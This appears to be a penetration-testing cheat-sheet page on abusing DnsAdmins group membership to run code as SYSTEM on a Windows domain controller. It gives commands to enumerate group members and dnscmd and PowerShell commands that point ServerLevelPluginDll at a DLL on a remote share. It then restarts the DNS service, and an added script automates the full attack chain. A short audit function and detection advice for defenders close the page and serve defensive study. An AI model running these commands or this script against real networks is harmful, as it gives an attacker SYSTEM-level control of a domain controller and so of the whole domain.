DNS Administrators
Members of the DnsAdmins group can make the DNS Server service (dns.exe) load an arbitrary DLL by setting the server-level plugin DLL (the ServerLevelPluginDll setting, stored under the DNS service's Parameters registry key). dns.exe runs as SYSTEM and, in most domains, on a domain controller, so code in that DLL runs as SYSTEM on the DC.
Setting the value only writes the configuration; the DLL is loaded when the service starts. DnsAdmins membership alone does not grant the right to stop and start the DNS service on the DC, so you need that right (or a service restart/reboot by someone else) to trigger the load.
Attacking DNS Admins
Enumerate DNS Admins
# PowerView
Get-NetGroupMember -GroupName "DNSAdmins"
# AD Module
Get-ADGroupMember -Identity "DNSAdmins"
From Linux
# pywerview.py
./pywerview.py get-netgroupmember -u <user> -p <pass> --dc-ip <ip> --groupname "DNSAdmins"
Exploitation
With DnsAdmins privileges, set the server-level plugin DLL on the DNS server with dnscmd.exe or the DNSServer PowerShell module (both need the RSAT DNS tools on the machine you run them from).
Host the DLL on a share the DC's computer account can read (dns.exe runs as SYSTEM, so it reaches the share as that account) and point the setting at it:
# using dnscmd.exe
dnscmd <dc> /config /serverlevelplugindll \\<share_ip>\dll\evil.dll
# using DNSServer Module
$dnsSettings = Get-DnsServerSetting -ComputerName <dc> -Verbose -All   # -All is needed; ServerLevelPluginDll is not in the default view
$dnsSettings.ServerLevelPluginDll = "\\<share_ip>\dll\evil.dll"
Set-DnsServerSetting -InputObject $dnsSettings -ComputerName <dc> -Verbose
Then restart the DNS service so dns.exe loads the DLL; the payload executes when the service starts. In PowerShell, call sc.exe explicitly, because sc is an alias of Set-Content there. Once you are done, clear the setting again (set ServerLevelPluginDll back to an empty value) so the DC is not left pointing at your share.
sc.exe \\<dc> stop dns
sc.exe \\<dc> start dns
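The whole procedure as one PowerShell script, added here as an example (not code from the original page): it sets the plugin value through the DNSServer module, reads it back, restarts the service with sc.exe, clears the value afterwards, and adds an audit function a defender can run across the domain controllers. The hostname, the share path, and the use of WinRM and the ActiveDirectory module for the audit are assumptions.

```powershell
# Added example, not code from the original page. $Dc and $DllPath are assumed
# placeholders; the DnsServer module (RSAT DNS tools) must be installed locally.
Import-Module DnsServer

$Dc      = 'dc01.corp.local'          # assumed DNS server / domain controller
$DllPath = '\\10.0.0.5\dll\evil.dll'  # assumed UNC path; the share must be readable
                                      # by the DC's computer account, because dns.exe
                                      # (SYSTEM) reaches the share as that account

# Point the server-level plugin setting at the hosted DLL.
function Set-DnsPluginDll {
    param([string]$Server, [string]$Path)
    # -All is required: ServerLevelPluginDll is not part of the default setting view.
    $settings = Get-DnsServerSetting -ComputerName $Server -All
    $settings.ServerLevelPluginDll = $Path
    Set-DnsServerSetting -InputObject $settings -ComputerName $Server
}

# Read the current value back (used both to verify the change and to audit).
function Get-DnsPluginDll {
    param([string]$Server)
    (Get-DnsServerSetting -ComputerName $Server -All).ServerLevelPluginDll
}

# dns.exe only loads the DLL when the service starts. DnsAdmins membership does
# not by itself grant service control on the DC; this step needs that right.
# sc.exe is called explicitly because 'sc' is an alias of Set-Content in PowerShell.
function Restart-RemoteDns {
    param([string]$Server)
    sc.exe "\\$Server" stop dns | Out-Null
    # Wait until the service reports STOPPED before starting it again.
    do {
        Start-Sleep -Seconds 2
        $query = (sc.exe "\\$Server" query dns) -join ' '
    } while ($query -notmatch 'STOPPED')
    sc.exe "\\$Server" start dns
}

# Clean-up: an empty value means no plugin DLL is loaded on the next start.
function Clear-DnsPluginDll {
    param([string]$Server)
    Set-DnsPluginDll -Server $Server -Path ''
}

# Defender side: report every DNS server whose plugin value is set at all, and
# flag UNC paths explicitly. Reads the registry over WinRM (assumed reachable)
# so it does not depend on the DNS RPC interface.
function Find-DnsPluginDll {
    param([string[]]$Servers)
    foreach ($s in $Servers) {
        $value = Invoke-Command -ComputerName $s -ScriptBlock {
            (Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters' `
                -Name ServerLevelPluginDll -ErrorAction SilentlyContinue).ServerLevelPluginDll
        }
        [pscustomobject]@{
            Server    = $s
            PluginDll = $value
            IsSet     = -not [string]::IsNullOrEmpty($value)
            IsUncPath = [bool]($value -like '\\*')
        }
    }
}

# Usage (attack): set, verify, restart, then clear the value once done.
Set-DnsPluginDll   -Server $Dc -Path $DllPath
Get-DnsPluginDll   -Server $Dc
Restart-RemoteDns  -Server $Dc
Clear-DnsPluginDll -Server $Dc

# Usage (defence): audit every domain controller (ActiveDirectory module assumed).
Find-DnsPluginDll -Servers (Get-ADDomainController -Filter * | Select-Object -ExpandProperty HostName)
```

Any non-empty ServerLevelPluginDll value on a DC is worth investigating, since legitimate plugin DLLs are rare; a value pointing at a UNC path is a strong indicator of this technique. Clearing the value after use matters on both sides: a DC left pointing at an unreachable share will try to load it at every restart.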